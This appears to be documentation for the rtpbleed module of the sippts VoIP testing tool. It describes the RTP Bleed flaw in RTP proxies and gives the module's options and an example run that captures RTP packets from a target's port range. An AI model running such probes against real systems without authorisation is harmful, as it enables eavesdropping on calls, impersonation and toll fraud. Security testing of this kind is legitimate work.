The RTP bleed Bug is a serious vulnerability in a number of RTP proxies. This weakness allows malicious users to inject and receive RTP streams of ongoing calls without needing to be positioned as man-in-the-middle. This may lead to eavesdropping of audio calls, impersonation and possibly cause toll fraud by redirecting ongoing calls.

More info about the vulnerability: https://www.rtpbleed.com/

Usage

$ sippts rtpbleed -h

Payloads
--------
   0 PCMU  (audio)
   3 GSM   (audio)
   4 G723  (audio)
   5 DVI4  (audio)
   6 DVI4  (audio)
   7 LPC   (audio)
   8 PCMA  (audio)
   9 G722  (audio)
  10 L16   (audio)
  11 L16   (audio)
  12 QCELP (audio)
  13 CN    (audio)
  14 MPA   (audio)
  15 G728  (audio)
  16 DVI4  (audio)
  17 DVI4  (audio)
  18 G729  (audio)
  25 CELLB (video)
  26 JPEG  (video)
  28 nv    (video)
  31 H261  (video)
  32 MPV   (video)
  33 MP2T  (audio/video)
  34 H263  (video)

Target:
  -i IP       Target IP address

Other options:
  -s PORT     Start port of the host (default: 10000)
  -e PORT     End port of the host (default: 20000)
  -l LOOPS    Number of times to probe the port ranges on the target(s) (default: 4)
  -p PAYLOAD  Codec payload (default: 0)
  -d DELAY    Delay for timeout in microseconds (default: 1)
  -h, --help  Show this help

Example

$ sippts rtpbleed -i 192.168.1.1

[!] Target IP: 192.168.1.1
[!] Port range: 10000-20000
[!] Payload type: 0
[!] Number of tries per port: 4
[!] Delay between tries: 50 microseconds

[+] Checking port: 10070 with payload type 0 (Seq number: 1)
[+] received 172 bytes from target port 10070 - loop 1
    [-] SSRC: 55954f70 - Timestamp: 1124640 - Seq number: 26239
[+] Checking port: 10070 with payload type 0 (Seq number: 3)
[+] received 172 bytes from target port 10070 - loop 3
    [-] SSRC: 55954f70 - Timestamp: 1125440 - Seq number: 26244